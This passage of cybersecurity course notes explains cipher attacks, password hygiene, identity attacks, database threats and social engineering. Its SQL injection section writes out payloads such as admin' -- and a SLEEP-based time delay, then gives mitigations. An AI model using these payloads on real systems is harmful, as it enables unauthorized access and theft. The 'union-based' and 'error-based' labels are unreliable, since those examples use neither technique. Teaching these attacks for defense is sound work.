the details about the system. By analyzing the chosen ciphertext and
relating it to the plaintext, the attacker attempts to guess the key. Older
versions of RSA encryption were prone to this attack.

A chosen ciphertext attack (CCA) is a type of attack on an encryption
scheme where an attacker has the ability to decrypt chosen ciphertexts
and use the results to deduce the encryption key or decrypt other
ciphertexts. Here's a simple example:

Suppose we have a simple substitution cipher where each letter is shifted
by a fixed number of positions in the alphabet (e.g., Caesar cipher). The
encryption key is the shift value.

1. Attacker chooses a ciphertext: "zhofrph wr fvh"
2. Attacker asks the oracle (the decryption function) to decrypt the
ciphertext.
3. Oracle responds with the plaintext: "WELCOME TO CSE"
4. Attacker analyzes the decryption result and notices that the first letter
"Z" was decrypted to "W", which means the shift value is 3 (since Z is 3
positions ahead of W in the alphabet).
5. Attacker uses this knowledge to decrypt other ciphertexts or even
encrypt their own messages using the same key.
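The oracle exchange in steps 1 to 5, worked through in Python as an added example (this is not code from the notes). A toy Caesar cipher stands in for the encryption scheme, `decryption_oracle` models a system that decrypts whatever it is handed, and one query is enough to recover the shift. The function names and the second message used to show step 5 are assumptions of this example; the lesson for a defender is that exposing any such decryption oracle gives away the key, which is why modern schemes are designed to resist chosen-ciphertext queries.

```python
# Added example, not from the notes: chosen-ciphertext attack on a toy
# Caesar cipher. The oracle models a system that decrypts any ciphertext
# it is given; the attacker needs only one query to recover the key.
import string

ALPHABET = string.ascii_uppercase


def caesar_encrypt(text: str, shift: int) -> str:
    """Shift every letter by `shift` positions; other characters pass through."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(text: str, shift: int) -> str:
    """Decryption is encryption with the negated shift."""
    return caesar_encrypt(text, -shift)


SECRET_SHIFT = 3  # the key: known to the oracle, not to the attacker


def decryption_oracle(ciphertext: str) -> str:
    """Models the system the attacker can query (step 2 in the notes)."""
    return caesar_decrypt(ciphertext, SECRET_SHIFT)


def recover_shift(oracle, chosen_ciphertext: str) -> int:
    """Steps 1, 3 and 4: submit a chosen ciphertext, read the plaintext back,
    and derive the shift from the first letter pair (Z -> W gives 3)."""
    plaintext = oracle(chosen_ciphertext)
    for c, p in zip(chosen_ciphertext.upper(), plaintext):
        if c in ALPHABET and p in ALPHABET:
            return (ALPHABET.index(c) - ALPHABET.index(p)) % 26
    raise ValueError("chosen ciphertext contains no letters to compare")


def decrypt_with_recovered_key(oracle, chosen_ciphertext: str, other_ct: str) -> str:
    """Step 5: once the shift is known, other ciphertexts are decrypted
    without asking the oracle again."""
    return caesar_decrypt(other_ct, recover_shift(oracle, chosen_ciphertext))


if __name__ == "__main__":
    ct = "zhofrph wr fvh"  # the chosen ciphertext from the notes
    print("oracle says:", decryption_oracle(ct))
    print("recovered shift:", recover_shift(decryption_oracle, ct))
```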

 Known plaintext attack

In this attack technique, the cybercriminal finds or knows the plaintext of
some portions of the ciphertext using information gathering techniques.
Linear cryptanalysis in block cipher is one such example.
Let’s try the following values:
 The encryption key, whose value we don’t know, is KEY=10101010
 The first plaintext we consider for both attacks will be
plaintext=11111111
We’ll begin with the known-plaintext attack. By the hypothesis of this attack,
we get to know in advance the ciphertext that results out of
encryption(Plaintext,key). Accordingly, the value of ciphertext is 01010101.
Because we know both plaintext=11111111 and ciphertext=01010101, in this
case we can exactly compute the key as key = plaintext + ciphertext, where
"+" is bitwise addition modulo 2 (XOR), the operation this toy cipher uses;
therefore key = 11111111 + 01010101 = 10101010.
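The known-plaintext computation just shown and the chosen-plaintext table earlier in this section, worked through in Python as an added example (not code from the notes). It assumes the toy cipher is a single 8-bit XOR with the key, which is what the notes' values imply; the key and plaintexts are the notes' own, the function names are mine. `looks_bitwise` checks the observation the notes draw from the table: flipping one plaintext bit flips exactly the same ciphertext bit and nothing else.

```python
# Added example, not from the notes: toy 8-bit XOR cipher, the
# known-plaintext key recovery and the chosen-plaintext bit-flip probe.
from typing import Callable, List, Tuple

KEY = 0b10101010  # the secret key from the notes (unknown to the attacker)


def encrypt(plaintext: int, key: int = KEY) -> int:
    """Toy cipher assumed here: ciphertext = plaintext XOR key, one 8-bit block."""
    return (plaintext ^ key) & 0xFF


def known_plaintext_attack(plaintext: int, ciphertext: int) -> int:
    """KPA: one (plaintext, ciphertext) pair gives the key exactly, because
    XOR is its own inverse: key = plaintext XOR ciphertext."""
    return plaintext ^ ciphertext


def chosen_plaintext_probe(oracle: Callable[[int], int]) -> List[Tuple[str, str]]:
    """CPA: start from 11111111, flip one bit at a time (last bit first) and
    record the ciphertext each time. Returns the association table."""
    base = 0b11111111
    table = [(f"{base:08b}", f"{oracle(base):08b}")]
    for bit in range(8):
        p = base ^ (1 << bit)
        table.append((f"{p:08b}", f"{oracle(p):08b}"))
    return table


def looks_bitwise(table: List[Tuple[str, str]]) -> bool:
    """True when every single-bit plaintext change produces the same
    single-bit ciphertext change, the signature of a bit-wise operator."""
    base_p, base_c = (int(x, 2) for x in table[0])
    for p_str, c_str in table[1:]:
        p, c = int(p_str, 2), int(c_str, 2)
        if (p ^ base_p) != (c ^ base_c):
            return False
    return True


if __name__ == "__main__":
    print("KPA recovers key:", f"{known_plaintext_attack(0b11111111, 0b01010101):08b}")
    tbl = chosen_plaintext_probe(encrypt)
    print("Plaintext   Ciphertext")
    for p, c in tbl:
        print(p, "  ", c)
    print("bit-wise operator suspected:", looks_bitwise(tbl))
```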

 Key and algorithm attack

Here, the attacker tries to recover the key used to encrypt or decrypt the
data by analyzing the cryptographic algorithm.

How to Create Strong Passwords

 As a user, you can do many things to support your protection in the
digital world. The best defence against password attacks is ensuring that
your passwords are as strong as they can be.
 Brute force attacks rely on time to crack your password. So, your goal is
to make sure your password slows down these attacks as much as
possible because if it takes too long for the breach to be worthwhile, most
hackers will give up and move on.

Here are a few ways you can create strong passwords against brute force attacks:

o Use an advanced username and password: Protect yourself with
stronger credentials than admin and password to keep out these attackers.
The stronger this combination is, the harder it will be for anyone to
penetrate it.
o Use a password manager. Installing a password manager automates
creating and keeping track of your online login info. These allow you to
access all your accounts by first logging into the password manager. You
can then create extremely long and complex passwords for all the sites
you visit, store them safely, and you only have to remember the one
primary password.
o Stay away from frequently used passwords. It’s important to avoid the
most common passwords and to change them frequently.

Identity attacks
Identity attacks refer to malicious activities aimed at stealing,
manipulating, or exploiting individuals' personal information, credentials, or
identities to gain unauthorized access, privileges, or benefits. These attacks
target sensitive data such as:
 Names
 Passwords
 Social Security Numbers (SSNs)
 Credit card information
 Email addresses
 Personal identifiable information (PII)
Identity attacks can be launched through various tactics, including:

1. Phishing: A social engineering attack where attackers trick victims into
revealing sensitive information (e.g., passwords, credit card numbers) via
fake emails, texts, or websites that mimic legitimate sources.
2. Spear Phishing: A targeted phishing attack focused on a specific
individual or group, often using personalized information to increase the
likelihood of success.
3. Whaling: A spear phishing attack targeting high-level executives or
decision-makers, aiming to steal sensitive information or gain access to
systems.
4. Identity Theft: The unauthorized use of someone's personal information
(e.g., name, SSN, credit card details) to commit fraud or other crimes.
5. Impersonation: An attacker assumes the identity of a legitimate user or
entity to gain access to systems, data, or privileges.
6. Man-in-the-Middle (MitM) Attack: An attacker intercepts
communication between two parties, potentially stealing sensitive
information or injecting malicious content.
7. Session Hijacking: An attacker takes control of a user's session after
they've authenticated, allowing unauthorized access to sensitive data or
systems.
8. Password Spraying: Attackers use automated tools to try a list of
commonly used passwords against multiple user accounts, hoping to find
a match.
9. Credential Stuffing: Attackers use previously compromised
username/password combinations to gain access to other accounts,
exploiting password reuse.
10. Account Takeover (ATO): An attacker gains unauthorized access to a
user's account, often using stolen or weak credentials, to perform
malicious activities.
The goals of identity attacks can include:
 Financial gain (e.g., fraud, theft)
 Unauthorized access to systems, data, or resources
 Identity theft
 Reputation damage
 Espionage
 Other malicious activities

Identity attacks can be categorized into two main types:

1. Identity theft: Stealing personal information to impersonate or assume
someone's identity.
2. Identity manipulation: Altering or falsifying identity information to
deceive or mislead.

Threats to Database Security

Database security refers to the measures taken to protect a database from
unauthorized access, use, disclosure, disruption, modification, or destruction. It
involves a combination of administrative, technical, and physical controls to
ensure the confidentiality, integrity, and availability of the data stored in the
database.

Database security includes:

1. Access control: Limiting access to authorized users and controlling their
privileges.
2. Authentication: Verifying user identities before allowing access.
3. Encryption: Protecting data in transit and at rest.
4. Backup and recovery: Ensuring data availability in case of failures or
disasters.
5. Auditing and monitoring: Tracking database activities and detecting
potential security threats.
6. Data masking and anonymization: Protecting sensitive data by masking or
anonymizing it.
7. Intrusion detection and prevention: Identifying and blocking unauthorized
access attempts.
8. Secure coding practices: Developing secure database applications and
interfaces.
9. Physical security: Protecting database servers and storage media from
physical access.
10. Compliance and governance: Adhering to regulatory requirements and
organizational policies.

Effective database security ensures:

 Confidentiality: Protecting sensitive data from unauthorized access.
 Integrity: Ensuring data accuracy and consistency.
 Availability: Maintaining access to data for authorized users.

Threats to database security can be categorized into several types:

1. Unauthorized Access: Hackers gaining access to sensitive data without
permission. The act of accessing, using, or manipulating database resources
without permission or exceeding authorized privileges. This can lead to:

 Data breaches: Sensitive data exposure or theft.
 Data tampering: Unauthorized modifications to data.
 Data destruction: Intentional deletion or corruption of data.
 Privilege escalation: Gaining elevated privileges to perform unauthorized
actions.
 Malicious activities: Performing harmful actions, such as inserting
malware or launching attacks.
Types of unauthorized access:
 External attacks: Hackers exploiting vulnerabilities or using social
engineering tactics.
 Insider threats: Authorized personnel abusing their privileges or
intentionally compromising security.
 Credential stuffing: Using stolen or compromised credentials to gain
access.
 SQL injection: Injecting malicious SQL code to manipulate data or gain
access.
To prevent unauthorized access:
 Implement robust access controls: Use strong authentication,
authorization, and accounting (AAA) mechanisms.
 Enforce least privilege: Grant only necessary privileges to users and
applications.
 Monitor and audit: Regularly monitor database activity and audit logs for
suspicious behavior.
 Use encryption: Protect data in transit and at rest.
 Keep software up-to-date: Regularly update database management
systems and plugins to patch vulnerabilities.
 Educate users: Raise awareness about database security best practices
and phishing attacks.

2. SQL Injection: Malicious SQL code injected into database queries to extract
or modify data.

SQL injection
SQL injection is a type of security vulnerability that occurs when an
attacker manipulates a SQL query to gain unauthorized access to a
database or alter its content. This typically happens when user inputs are
improperly sanitized or validated, allowing malicious SQL code to be
executed. Here are some common examples to illustrate SQL injection:

1. Basic SQL Injection

Scenario: A login form allows users to enter their username and password. The application
uses these inputs to create an SQL query to verify credentials.
Vulnerable SQL Query:

SELECT * FROM users WHERE username = 'user_input' AND password = 'pass_input';

Example Injection: If an attacker enters admin' -- as the username and leaves the password
field empty, the resulting query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = '';

Explanation: The -- comment sequence in SQL comments out the rest of the query, so the
password check is bypassed. This could allow the attacker to log in as an admin if the
username admin exists in the database.

2. Union-Based SQL Injection

Scenario: A web application displays data from a database based on user input.
Vulnerable SQL Query:

SELECT * FROM products WHERE category = 'user_input';

Example Injection: If an attacker inputs ' OR 1=1 --, the resulting query becomes:

SELECT * FROM products WHERE category = '' OR 1=1 --';

Explanation: The condition 1=1 is always true, so the query returns all records from the
products table, potentially exposing sensitive data.

3. Blind SQL Injection

Scenario: A web application provides feedback on whether a username exists in
the database.
Vulnerable SQL Query:

SELECT * FROM users WHERE username = 'user_input';

Example Injection: If an attacker inputs a username like ' OR 1=1 --, the query
becomes:

SELECT * FROM users WHERE username = '' OR 1=1 --';

Explanation: The query always returns true due to 1=1, allowing the attacker to
infer information about the existence of users based on the application’s
response.
4. Error-Based SQL Injection

Scenario: An application returns detailed error messages when SQL queries
fail.
Vulnerable SQL Query:

SELECT * FROM orders WHERE order_id = 'user_input';

Example Injection: If an attacker inputs 1' OR '1'='1, the query becomes:

SELECT * FROM orders WHERE order_id = '1' OR '1'='1';

Explanation: The query always returns true because '1'='1' is always true. The
application might reveal error messages that can be used to further probe the
database structure.

5. Time-Based Blind SQL Injection

Scenario: An application uses user input to filter data but does not return
detailed error messages.
Vulnerable SQL Query:

SELECT * FROM employees WHERE employee_id = 'user_input';

Example Injection: If an attacker inputs 1' OR IF(1=1, SLEEP(5), 0) --, the
query becomes:

SELECT * FROM employees WHERE employee_id = '1' OR IF(1=1, SLEEP(5), 0) --';

Explanation: The SLEEP(5) function causes the database to pause for 5
seconds. The attacker can infer whether the condition 1=1 is true based on the
delay, revealing information about the system.

Mitigation Strategies
1. Parameterized Queries: Use parameterized queries or prepared
statements to ensure that user inputs are treated as data and not executable
code.

SELECT * FROM users WHERE username = ? AND password = ?;

2. Stored Procedures: Use stored procedures to encapsulate SQL logic and
reduce the risk of injection.
3. Input Validation: Validate and sanitize all user inputs to ensure they
conform to expected formats.
4. Least Privilege Principle: Limit database user permissions to the
minimum necessary to perform their tasks.
5. Error Handling: Avoid displaying detailed error messages to end-users;
instead, log errors securely for debugging purposes.
6. Security Testing: Regularly test and audit your application for SQL
injection vulnerabilities using automated tools and manual testing
techniques.
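The login query from "Basic SQL Injection" beside the parameterized form from mitigation 1, run against a constructed in-memory SQLite table, as an added example (this is not code from the notes). The table, its single row and the function names are assumptions of this example; the password is stored in plaintext only to keep the demonstration short, a real application stores and compares a salted hash. Both the admin' -- input and the ' OR 1=1 -- input from the examples above log in through the concatenated query and fail through the parameterized one.

```python
# Added example, not from the notes: the login check built by string
# concatenation (vulnerable) and with placeholders (parameterized).
# Uses SQLite from the standard library; table, row and names are
# constructed here for the demonstration.
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one sample account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; real systems store a
    # salted hash and compare against that.
    conn.execute("INSERT INTO users VALUES ('admin', 'example-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str]]:
    """Builds the SQL by concatenation: the input becomes part of the query
    text, so admin' -- comments out the password check entirely."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str,
                        password: str) -> Optional[Tuple[str]]:
    """Placeholders: the driver passes the values separately from the SQL,
    so a quote or comment sequence in the input is just text to match."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for user in ("admin' --", "' OR 1=1 --"):
        print(repr(user), "vulnerable ->", login_vulnerable(db, user, ""),
              "| parameterized ->", login_parameterized(db, user, ""))
```

The parameterized version is what mitigation 1 describes; the remaining mitigations (least privilege for the database account, generic error messages, input validation) reduce what a successful injection could reach but do not replace it.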
3. Data Tampering: Data tampering refers to the unauthorized modification,
deletion, or alteration of data in a database or system. This can be done
intentionally or unintentionally, and can have serious consequences,
including:
 Data corruption: Incorrect or inconsistent data, leading to inaccurate
analysis or decision-making.
 Data loss: Permanent deletion or alteration of critical data.
 Security breaches: Tampered data can be used to gain unauthorized access
or exploit vulnerabilities.
 Compliance issues: Tampering can lead to non-compliance with
regulatory requirements.
 Reputation damage: Data tampering can erode trust in an organization's
data management practices.
Types of data tampering:
 Insertion: Adding new, unauthorized data.
 Deletion: Removing existing data without permission.
 Modification: Altering existing data without authorization.
 Manipulation: Changing data to conceal or distort information.
To prevent data tampering:
i. Access controls: Implement robust authentication, authorization, and
accounting (AAA) mechanisms.
ii. Data encryption: Protect data in transit and at rest.
iii. Auditing and logging: Monitor and track all data modifications.
iv. Data backup and recovery: Regularly backup data and have a recovery
plan in place.
v. Data validation: Verify data integrity and consistency.
vi. User education: Raise awareness about data tampering risks and
consequences.
Data breach: Sensitive data exposed or stolen, often due to inadequate
security measures.
4. Denial of Service (DoS): Denial of Service (DoS) is a type of cyberattack
that aims to make a database or system unavailable to users by
overwhelming it with traffic or requests, exhausting its resources, or
disrupting its services. This can be done in various ways, including:
 Flooding: Sending excessive traffic or requests to overwhelm the
system.
 Resource exhaustion: Consuming system resources, such as CPU,
memory, or bandwidth.
 Network disruption: Disrupting network connectivity or
communication.

Types of DoS attacks:

 Volumetric attacks: Flooding with high-volume traffic.
 Protocol attacks: Exploiting protocol vulnerabilities.
 Application attacks: Targeting specific applications or services.
 Distributed Denial of Service (DDoS): Coordinated attacks from
multiple sources.
To prevent or mitigate DoS attacks:
 Network security measures: Firewalls, intrusion detection systems,
and rate limiting.
 Resource scaling: Scalable infrastructure to handle increased traffic.
 Traffic filtering: Filtering out malicious traffic.
 Monitoring and incident response: Detecting and responding to
attacks quickly.
 DDoS protection services: Specialized services to mitigate DDoS
attacks.
 Regular security updates and patches: Keeping systems and
software up-to-date.
5. Malware: Malicious software compromising database security, potentially
leading to data theft or corruption.

6. Insider Threats: Insider threats refer to security risks or vulnerabilities that
originate from within an organization, typically from employees, contractors,
or other individuals with authorized access to the database or system. Insider
threats can be intentional or unintentional and can cause significant harm to
the organization.
I. Malicious insiders: Intentionally compromising security for
personal gain or revenge.
II. Accidental insiders: Unintentionally causing security breaches due
to negligence or lack of awareness.
III. Compromised insiders: Authorized personnel who have been
manipulated or coerced into compromising security.
Common insider threat scenarios:
 Data theft or exfiltration
 Unauthorized access or privilege escalation
 Data tampering or manipulation
 System compromise or sabotage
 Intellectual property theft
7. Physical Threats: Unauthorized physical access to database servers or
storage media.
8. Network Threats: Exploitation of network vulnerabilities to access or
compromise the database.
9. Application Threats: Vulnerabilities in database applications or interfaces
exploited to gain unauthorized access, manipulate data, or disrupt services.
Common application threats include:
1. SQL Injection: Injecting malicious SQL code to manipulate data or gain
access.
2. Cross-Site Scripting (XSS): Injecting malicious code into web
applications to steal data or take control.
3. Cross-Site Request Forgery (CSRF): Tricking users into performing
unintended actions.
4. Buffer Overflow: Exploiting buffer overflow vulnerabilities to execute
malicious code.
5. Input Validation: Failing to validate user input, allowing malicious data to
enter the database.
6. Authentication and Authorization: Weak or flawed authentication and
authorization mechanisms.
7. Sensitive Data Exposure: Exposing sensitive data, such as credit card
numbers or passwords.
8. Broken Authentication: Weak or flawed authentication mechanisms.
9. Security Misconfiguration: Misconfigured security settings or features.
To mitigate these threats, implement robust security measures, including:
 Access controls and authentication
 Encryption and secure storage
 Regular backups and auditing
 Secure coding practices
 Network and system security
 Monitoring and incident response
 User education and awareness

Hacking and social engineering

 Social engineering is the art of manipulating people so they give up
confidential information.
 The types of information these criminals are seeking can vary.
 But when individuals are targeted, the criminals are usually trying to
trick you into giving them your passwords or bank information, or access
your computer to secretly install malicious software – that will give them
access to your passwords and bank information as well as giving them
control over your computer.
 Criminals use social engineering tactics because it is usually easier to
exploit your natural inclination to trust than it is to discover ways to hack
your software.
 For example, it is much easier to fool someone into giving you their
password than it is for you to try hacking their password (unless the
password is really weak).
 Ask any security professional and they will tell you that the weakest link
in the security chain is the human who accepts a person or scenario at
face value. It doesn’t matter how many locks and deadbolts are on your
doors and windows, or if you have guard dogs, alarm systems, floodlights,
fences with barbed wire, and armed security personnel; if you trust the
person at the gate who says he is the pizza delivery guy and you let him
in without first checking to see if he is legitimate, you are completely
exposed to whatever risk he represents.

What Does a Social Engineering Attack Look Like?

Email from a friend
 If a criminal manages to hack or socially engineer one person’s email
password, they have access to that person’s contact list – and because most
people use one password everywhere, they probably have access to that
person’s social networking contacts as well.
 Once the criminal has that email account under their control, they send
emails to all the person’s contacts or leave messages on all their friends’
social pages, and possibly on the pages of the person’s friends’ friends.
Taking advantage of your trust and curiosity, these messages will:
 Contain a link that you just have to check out – and because the link
comes from a friend and you’re curious, you’ll trust the link and click –
and be infected with malware so the criminal can take over your machine
and collect your contacts’ info and deceive them just like you were
deceived.
 Contain a download of pictures, music, movie, document, etc., that has
malicious software embedded. If you download – which you are likely to
do since you think it is from your friend – you become infected. Now, the
criminal has access to your machine, email account, social network
accounts and contacts, and the attack spreads to everyone you know. And
on, and on.
Email from another trusted source
 Phishing attacks are a subset of social engineering strategy that imitate a
trusted source and concoct a seemingly logical scenario for handing over
login credentials or other sensitive personal data. According to Webroot
data, financial institutions represent the vast majority of impersonated
companies and, according to Verizon's annual Data Breach Investigations
Report, social engineering attacks including phishing and pretexting (see
below) are responsible for 93% of successful data breaches.
Using a compelling story or pretext, these messages may:
 Urgently ask for your help. Your ’friend’ is stuck in country X, has been
robbed, beaten, and is in the hospital. They need you to send money so
they can get home and they tell you how to send the money to the
criminal.
 Use phishing attempts with a legitimate-seeming background.
Typically, a phisher sends an e-mail, IM, comment, or text message that
appears to come from a legitimate, popular company, bank, school, or
institution.
 Ask you to donate to their charitable fundraiser, or some other
cause. Likely with instructions on how to send the money to the criminal.
Preying on kindness and generosity, these phishers ask for aid or support
for whatever disaster, political campaign, or charity is momentarily top-
of-mind.
 Present a problem that requires you to "verify" your information by
clicking on the displayed link and providing information in their
form. The link location may look very legitimate with all the right logos,
and content (in fact, the criminals may have copied the exact format and
content of the legitimate site). Because everything looks legitimate, you
trust the email and the phony site and provide whatever information the
crook is asking for. These types of phishing scams often include a
warning of what will happen if you fail to act soon because criminals
know that if they can get you to act before you think, you’re more likely
to fall for their phishing attempt.
 Notify you that you’re a ’winner.’ Maybe the email claims to be from a
lottery, or a dead relative, or the millionth person to click on their site,
etc. In order to give you your ’winnings’ you have to provide information
about your bank routing so they know how to send it to you or give your
address and phone number so they can send the prize, and you may also
be asked to prove who you are often including your social security
number. These are the ’greed phishes’ where even if the story pretext is
thin, people want what is offered and fall for it by giving away their
information, then having their bank account emptied, and identity stolen.
 Pose as a boss or coworker. It may ask for an update on an important,
proprietary project your company is currently working on, for payment
information pertaining to a company credit card, or some other inquiry
masquerading as day-to-day business.

Difference
 Differing from the traditional type of hacker, who modifies a computer's
software and hardware structure to carry out certain tasks, social
engineering uses people as weapons to attack select targets.
 In this way the manipulation is accomplished by exploiting trust through
different forms of communication.
